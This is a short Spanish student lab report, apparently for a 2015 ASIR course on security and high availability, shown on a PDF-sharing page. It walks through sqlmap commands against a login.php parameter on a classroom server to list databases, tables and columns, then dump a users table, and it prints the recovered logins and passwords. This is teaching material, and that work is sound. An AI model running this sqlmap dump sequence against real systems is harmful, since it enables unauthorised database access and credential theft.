sql injection Fernando Zapata .pdf
Nombre del archivo original: sql injection_Fernando_Zapata.pdf
Título: SEGURIDAD Y ALTA DISPONIBILIDAD
Autor: alumno
Este documento en formato PDF 1.5 fue generado por Microsoft® Word 2010, y fue enviado en caja-pdf.es el 20/12/2015 a las 20:00, desde la dirección IP 87.219.x.x.
La página de descarga de documentos ha sido vista 1694 veces.
Tamaño del archivo: 676 KB (5 páginas).
Privacidad: archivo público
Vista previa del documento
SEGURIDAD Y
ALTA
DISPONIBILIDAD
2º ASIR
I.E.S. Lázaro Cárdenas
Autor: Fernando Zapata
2015
- SEGURIDAD Y ALTA DISPONIBILIDAD
Se selecciona la ruta del navegador
Al dar error, se quita la parte
sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user= -dbs
Nos indica las bases de datos que existen
La que se va a sacar información es dbasir203
2
- SEGURIDAD Y ALTA DISPONIBILIDAD
Para sacar las tablas se selecciona la database con –D nombre_BBDD
sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user= -D db2asir03 --tables
Se ve el resultado que contiene una table.
Se acceden a las columnas de la table usuarios
sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user=--T
usuarios --columns
3
- SEGURIDAD Y ALTA DISPONIBILIDAD
Con la siguiente orden lo vuelcas a un fichero
sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user= -T usuarios --dump
Para sacar la clave y pass
sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user= -T
usuarios --dump
4
- SEGURIDAD Y ALTA DISPONIBILIDAD
En esta table existian dos usuarios, como se puede ver en la foto. El escaneo fue más largo
por este motivo.
Aún así se puede ver como los login son
LOGIN PASSWORD
Asir03
teacher
Asir04
student
5
Descargar el documento (PDF)
sql injection_Fernando_Zapata.pdf (PDF, 676 KB)
Documentos relacionados
Palabras claves relacionadas
orden
disponibilidad
seguridad
sqlmap
asir04
usuarios
selecciona
table
columnas
2asir03
login
carpetas
puede
sacar
acceden